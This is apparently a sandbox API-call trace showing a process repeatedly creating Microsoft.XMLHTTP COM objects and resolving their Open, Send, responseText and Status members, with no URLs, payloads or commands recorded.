	[0484.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0484.765] ??2@YAPEAX_K@Z () returned 0x62f330
	[0484.765] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0484.765] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0484.766] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0484.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0484.766] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0484.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.766] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0484.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0484.768] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0484.769] SysStringLen (param_1=0x0) returned 0x0
	[0484.769] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0484.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0484.769] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0484.769] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0484.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0484.769] ??2@YAPEAX_K@Z () returned 0x62f310
	[0484.769] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0484.769] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0484.769] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0484.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0484.769] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0484.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.769] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0484.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0484.770] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0484.770] SysStringLen (param_1=0x0) returned 0x0
	[0484.770] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0484.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0484.770] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0484.770] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0484.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0484.770] ??2@YAPEAX_K@Z () returned 0x62f330
	[0484.770] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0484.770] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0484.770] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0484.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0484.770] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0484.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.770] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0484.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0484.771] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0484.771] SysStringLen (param_1=0x0) returned 0x0
	[0484.771] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0484.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0484.771] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0484.771] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0484.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0484.771] ??2@YAPEAX_K@Z () returned 0x62f310
	[0484.771] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0484.771] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0484.771] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0484.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0484.771] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0484.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.772] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0484.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0484.772] longjmp () 
	[0484.772] longjmp () 
	[0484.772] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0484.772] SysStringLen (param_1=0x0) returned 0x0
	[0484.772] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0484.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0484.772] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0484.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0484.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0484.772] ??2@YAPEAX_K@Z () returned 0x62f330
	[0484.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0484.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0484.772] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0484.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0484.772] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0484.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0484.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0484.773] longjmp () 
	[0484.773] longjmp () 
	[0484.773] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0484.774] SysStringLen (param_1=0x0) returned 0x0
	[0484.774] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0484.774] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0484.774] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0484.774] ??2@YAPEAX_K@Z () returned 0x62f310
	[0484.774] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0484.774] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0484.774] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.774] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0484.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0484.775] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0484.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0485.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0485.367] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0485.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0485.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0485.367] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
